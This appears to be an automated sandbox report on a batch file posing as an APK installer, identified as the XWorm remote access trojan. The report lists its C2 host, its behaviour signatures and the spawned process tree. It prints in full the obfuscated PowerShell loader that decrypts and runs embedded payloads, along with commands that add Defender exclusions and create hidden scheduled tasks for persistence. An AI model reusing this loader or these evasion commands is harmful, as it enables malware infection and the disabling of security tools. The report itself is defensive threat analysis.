Analysis

  • max time kernel
    122s
  • max time network
    121s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-05-2024 15:06

General

  • Target

    APK_Installer.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_837_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_837.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4940
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_837.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_837.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_837.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_837.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4804
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3280
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:4584
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0c24ab58,0x7fff0c24ab68,0x7fff0c24ab78
      2⤵
        PID:1220
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:2
        2⤵
          PID:2448
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
          2⤵
            PID:1864
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
            2⤵
              PID:1944
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
              2⤵
                PID:3852
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
                2⤵
                  PID:2000
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
                  2⤵
                    PID:2788
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4292 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                    2⤵
                      PID:3200
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3988 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                      2⤵
                        PID:5004
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                        2⤵
                          PID:2156
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                          2⤵
                            PID:3480
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                            2⤵
                              PID:1464
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4624 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
                              2⤵
                                PID:4060
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                                2⤵
                                  PID:4124
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3296 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
                                  2⤵
                                    PID:1500
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3436 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                                    2⤵
                                      PID:1368
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
                                      2⤵
                                        PID:1916
                                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                      1⤵
                                        PID:2908
                                      • C:\Users\Admin\Runtime Broker.exe
                                        "C:\Users\Admin\Runtime Broker.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1716
                                      • C:\Windows\system32\AUDIODG.EXE
                                        C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004D4
                                        1⤵
                                          PID:4704
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                          1⤵
                                            PID:3452
                                          • C:\Users\Admin\Runtime Broker.exe
                                            "C:\Users\Admin\Runtime Broker.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            PID:332

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            2KB

                                            MD5

                                            376049a960407231a4d4755454e56f89

                                            SHA1

                                            a76c8ac786093e51a8c3772601b52be563be985f

                                            SHA256

                                            257fdc20af0236c9eeba61c2647bd950eb26dea400a2d267b50be7d70cf4615c

                                            SHA512

                                            6bd66b972d4f364891c03791dd5932b85cd9ae850f0ed4708e67183290bb497ae429482acd4977ab79c5ba31d074b577bbb2624ed7c056f4869bf088ad9c0b77

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            2KB

                                            MD5

                                            209353a74c45edb9f25917b640f962f6

                                            SHA1

                                            5d9304edfdd7e6576dfaa43615b10c7c0a3ddea9

                                            SHA256

                                            318cf5f5e5787d6ae5f4feb4cf1d1e49236086e8e63b6fe314e1e68825b21e78

                                            SHA512

                                            01981757ef00ca8a6383b7e5e9fdb6e1038e2725de6f2b23f0feefc048d53858e1e66d8aa19f180cad5d68ab4e6afb8751e44c195e36280772e0e1bfc79fb059

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                            Filesize

                                            264KB

                                            MD5

                                            0fdbe6432e0b06449631e0b24afeefe1

                                            SHA1

                                            6aeb5f2c21cb7d6628ee5cbbe2363133421b461a

                                            SHA256

                                            5bf032905be200c16b494e72b33bd4878332314a1d820bdabef10105ceccfec7

                                            SHA512

                                            3204cfbde48888044cf5c635456d07c7636c8aef1c6c742b3a59fca611231ecdb7dddeac7f7b67e090b2230587232ad45018d31d3df7311819d91b544f7c40d8

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                            Filesize

                                            4KB

                                            MD5

                                            a8bc16aaca1ecc1b68266c0b2d941263

                                            SHA1

                                            56ba9a3259253a45af766a20a689f185f0c27311

                                            SHA256

                                            1903586a5b3b0a69a603ba8a4d2ce720cc8c4fc226392f4d0c749b45ea7b2504

                                            SHA512

                                            d976f493d1acff5dc7804afe8a549b9e8f27332c6a6ef945b3783de93f95fd3468ef3895097ac8c6fdb53b4255cb56095a2288a7599139e7445c3e34c901cc43

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                            Filesize

                                            3KB

                                            MD5

                                            847bc97307c58707a3c38f2b6e1a444d

                                            SHA1

                                            1f867077a5624bc8a3d44a9f36505fa5f9ea2707

                                            SHA256

                                            5d3e83f727bb06c84efc27ba8b844152ed92f35e7377e22ca830e67debcda9c3

                                            SHA512

                                            e936c5f3332011af9a6cd6183642efd313892b2f6741d412343ad1055a16cf10ad6dff17da57650f5aa7f62e9630c08825bc3a2e6da94ae9330d390293f21dd7

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                            Filesize

                                            2B

                                            MD5

                                            d751713988987e9331980363e24189ce

                                            SHA1

                                            97d170e1550eee4afc0af065b78cda302a97674c

                                            SHA256

                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                            SHA512

                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            1KB

                                            MD5

                                            000cfb695bc437dc83cad7522c8cab3c

                                            SHA1

                                            5f07163b2f568ddd2d59c5eefbd8a2577dd58f7d

                                            SHA256

                                            b72c78087d6bdccc246f4e8f346bf707b2fc2c63c871892e47e6e0b0d7baf8bd

                                            SHA512

                                            b860a5e2506b7bb25c97b2cb73b885aa27822ec2a1ce213f4e96c2f5d100307b8bbae8bb25f837ce24f51090baee32e4403f18b3f457a78e752de171d9482911

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            1KB

                                            MD5

                                            33082d0c5f535e20f17d106153052870

                                            SHA1

                                            fc70462159f01e50dc3cbe66e8bcf1d727882671

                                            SHA256

                                            b181cd4f5818bfcf15c5f731247407a7167f4a7b9e0338e139e9c102e84e8a84

                                            SHA512

                                            0b0669678dbe80ab320150a15a8bf5d35857dcdc07e365529d92060d440184c8d85059874149408b08f6b6fb44a949c86ff9906ec5207fb8838a3dea7c5f6c03

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            356B

                                            MD5

                                            96cd4b35550f6b08a462f018141a98c3

                                            SHA1

                                            12c0e2a3cc3bb679d2f9e997bd148aeda4a66e34

                                            SHA256

                                            a29e919fdb81a89eef44c8c515a22eabe58bde1c6d9d0b743d419aeb5908050d

                                            SHA512

                                            d67ab526baaaa5f26bed2874a8ae64fdaf461cecb447663816d955e5375a576004c8690d1a969aed870acc9bf306c0120685ae4d4539ad64057d021c7bc6107d

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            356B

                                            MD5

                                            49c3add340f5f7abf75cd982a2b383f6

                                            SHA1

                                            fd73b9698c8bdc088a56ee27b968fe358b49b7c5

                                            SHA256

                                            df461d332c63375354c9dee7c58ba0b4e2f46f6e23166ae2e63c8c73ba361257

                                            SHA512

                                            4236ffd9d8d2e51cf7e269275612afc4a25bdb6d14bdbc2a5fcb5246065fb1a9fd70eda4649046c25a80a7ca1b975dd98391c93efabd035f3a2d2abced52e01a

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            1KB

                                            MD5

                                            b913fe2cf820a2384b5b74ee09ff45f0

                                            SHA1

                                            dec8db73a30ae56a1119ce38ce2e2ee9619d219c

                                            SHA256

                                            419a49d6ea0a65a5e7de19e11a68b69d0a5d744ce14d9470e670b1e479058c16

                                            SHA512

                                            0ac194b162e3cd40b231494d3a63af2e41262c7930547b708fb41425300158d441fdb2032f5b3b0b1573709fef1a07fe2eaa7061cf029504e5e7188193447790

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                            MD5

                                            5bb333c33ec30cda96e6bd471c8a6145

                                            SHA1

                                            d0541eda57d733339a2acf4a8b8e12e10d910787

                                            SHA256

                                            78d88758aa1f10b91caa59c55669c6fc29fc7bd71aabc212fc49acb750d419c3

                                            SHA512

                                            962941b58cf78ea4a31b9dca797e6e302eda88e5c4b04f13b25e6d6a618f1cc62af21c4a0176db5682ac065ed2be925828aae1a7315d9a68b365759367077464

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            6KB

                                            MD5

                                            c071fa3a8a2ef10cf118d421a4550771

                                            SHA1

                                            90fb0d7fdf69222b7763fb5b93b865efa63c5ddf

                                            SHA256

                                            3a8a10cf6d2ba3834bc7cd13517230fb9890978724731cbcb9ba7899294e3491

                                            SHA512

                                            d1517dce65c50a0b5ee76742af3d04013b30913a65ebb6e1a755210f08a4e03143e5d6173cd335c584677824c0d4198196104088c558d25034f892a429f5cdb3

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                            MD5

                                            f629836f9fb3d4ee82359255d6803147

                                            SHA1

                                            879160fc74d49b1d86e323b5c7b1f51da9438e09

                                            SHA256

                                            8df25826123d9f35203c3fce43437c9c8bbdbc7b29d3c2c93d44ee9df3922dfd

                                            SHA512

                                            7b6e469ebd68567d9b2a71189974b67e0e0017dd0474acd3282882d50d8122d4477c82e7f08c038307c7a8c0f87daa2fc890873499bd0a0d97da9c1506ab5a28

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                            Filesize

                                            16KB

                                            MD5

                                            43a10b3e1f08da8722aeb4a2306e52fd

                                            SHA1

                                            f2f99d490d391ad2c3d7d2dff6dc3df6f1372444

                                            SHA256

                                            e1cd3bd4f5e575167eeb853684877d661bb95797c272d5ab8aab755dd8b84905

                                            SHA512

                                            0ca97f75d79bac5156a671358802d09a3288bc4ec7d4eadbe5b2154bdfec76367497a81c0c2c2024f5c843372e46cbfcfbedb76d9b84d3c2d9582e565a7df143

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index

                                            Filesize

                                            456B

                                            MD5

                                            ebd848dcf6934e855166d2e39a05b219

                                            SHA1

                                            9673cbed8c0963f9ab0b02b18b9009356421e805

                                            SHA256

                                            cb28afb08990b93c8fac58b45ba312f576eee1fe8162db9fd9b8e7923ddf4e8d

                                            SHA512

                                            a9615ea7a1dce33399b848842b314032d346203f20a729c499ddecfb6c70e9b3d0345bd172a207fe242078b6b40e4f76d9307c64895241df8586f3c7af4f24de

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index~RFe58dcfd.TMP

                                            Filesize

                                            48B

                                            MD5

                                            17e94abcb444592b7c29b146ed266225

                                            SHA1

                                            1f5714a345986389bb78ddc43d31e16547f247a8

                                            SHA256

                                            c1398ad501b7865bf431292a046b8f843580a63cc291a84d4f0570ba74df9463

                                            SHA512

                                            4a2ecc506f239fb83c0db94106a65adcccb6adffaf0e89576ceb39261dc6da391432eee58542906c3fecfbd79f81fce010d2846a37c83ded928021856f8ec7f0

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index

                                            Filesize

                                            72B

                                            MD5

                                            f3c02b851c6abc5bbfa96c8f5fb8579b

                                            SHA1

                                            2fee0c966a34d205b94f338de579121f1c878d0b

                                            SHA256

                                            851cb56ab8a23f16b17115aa61904a9c82ebb99470d1b8b2639f93be48ceb98c

                                            SHA512

                                            491ba5a4ffb2699c114a095976a760c15b18aec1c58b82b5c8ef00fd21da964d156e77f881521ec843fd754fba54d054defca3f8bc1fc205326dd35df1ab87cf

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index~RFe58daab.TMP

                                            Filesize

                                            48B

                                            MD5

                                            ab5644f7d345836d1787d9808216dd4b

                                            SHA1

                                            fe3e611763cf0fb2d3c2d13a4f19c9d8a00a7caf

                                            SHA256

                                            fe4d59027424f998dfda8bbb4a748c14c40de91be829b5c6b9eb70dab4f0ddca

                                            SHA512

                                            c094a741797b03ce6d5bf50475fa486389a2e183b69b12ff800daef23f1124ce2a25a6fd42f8af929644b17e5ab7db107ba90bd04ae61e701cf04a6bf7269bb3

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

                                            Filesize

                                            197B

                                            MD5

